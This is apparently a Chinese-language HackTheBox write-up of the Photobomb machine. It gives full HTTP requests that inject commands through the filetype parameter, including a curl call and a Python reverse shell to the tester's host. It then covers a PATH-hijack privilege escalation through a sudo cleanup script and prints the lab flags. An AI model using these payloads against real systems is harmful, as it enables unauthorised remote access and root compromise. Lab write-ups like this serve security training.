Photobomb HTB Writeup
2023-03-07 本文已影响0人
doinb1517
logo.png
知识点
1、要记得测试命令注入
2、脚本内的命令要记得用绝对路径
WP
user权限
直接访问web页面得到域名photobomb.htb
01.png
开放了ssh和http服务
02.png
查看源码看到一个js,在里面发现了疑似用户名密码的东西
03.png
http://pH0t0:b0Mb!@photobomb.htb/printer
登陆进来发现是一个图片资源网站,可以下载图片资源
04.png
下载一个图片并抓包
05.png
测试一下命令注入漏洞,首先测试了photo参数,结果返回是无效的参数
06.png
继续测试下一个参数,在没有回显的情况下就开个http server,然后用curl或者wget测试命令执行的效果
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=nathaniel-worrell-zK_az6W3xIo-unsplash.jpg&filetype=png;curl${IFS}http://10.10.14.9/test.txt;&dimensions=150x100
08.png
07.png
测试命令执行成功了。我们反弹个shell回来
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 299
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=nathaniel-worrell-zK_az6W3xIo-unsplash.jpg&filetype=png;python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1234));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import+pty;+pty.spawn("sh")';&dimensions=150x100
拿到反弹shell后再使用python3拿一个交互shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
直接查看flag
09.png
6501ffbf08a57500de6aa0a4013c1798
我们顺便看看源码,这个命令注入漏洞是如何造成的
post '/printer' do
photo = params[:photo]
filetype = params[:filetype]
dimensions = params[:dimensions]
# handle inputs
if photo.match(/\.{2}|\//)
halt 500, 'Invalid photo.'
end
if !FileTest.exist?( "source_images/" + photo )
halt 500, 'Source photo does not exist.'
end
if !filetype.match(/^(png|jpg)/)
halt 500, 'Invalid filetype.'
end
if !dimensions.match(/^[0-9]+x[0-9]+$/)
halt 500, 'Invalid dimensions.'
end
case filetype
when 'png'
content_type 'image/png'
when 'jpg'
content_type 'image/jpeg'
end
filename = photo.sub('.jpg', '') + '_' + dimensions + '.' + filetype
response['Content-Disposition'] = "attachment; filename=#{filename}"
if !File.exists?('resized_images/' + filename)
command = 'convert source_images/' + photo + ' -resize ' + dimensions + ' resized_images/' + filename
puts "Executing: #{command}"
system(command)
else
puts "File already exists."
end
if File.exists?('resized_images/' + filename)
halt 200, {}, IO.read('resized_images/' + filename)
end
#message = 'Failed to generate a copy of ' + photo + ' resized to ' + dimensions + ' with filetype ' + filetype
message = 'Failed to generate a copy of ' + photo
halt 500, message
end
可以清楚的看到file_type拼接到了file_name里面,进而拼接进了command变量,最后system(command)执行了命令,但是其他参数都使用正则做了限制,所不能产生命令注入漏洞
提权
使用sudo -l尝试提权
10.png
wizard@photobomb:~$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
这里存在的问题是没有使用绝对路径,我们可以利用cd find chown命令来提权
wizard@photobomb:~$ echo "/bin/bash" > /tmp/cd
echo "/bin/bash" > /tmp/cd
wizard@photobomb:~$ echo "/bin/bash" > /tmp/find
echo "/bin/bash" > /tmp/find
wizard@photobomb:~$ chmod +x /tmp/cd
wizard@photobomb:~$ chmod +x /tmp/find
wizard@photobomb:~$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
11.png
root@photobomb:/home/wizard/photobomb# cat /root/root.txt
cat /root/root.txt
66699a98eeee3fcb57aa1d76468eef74
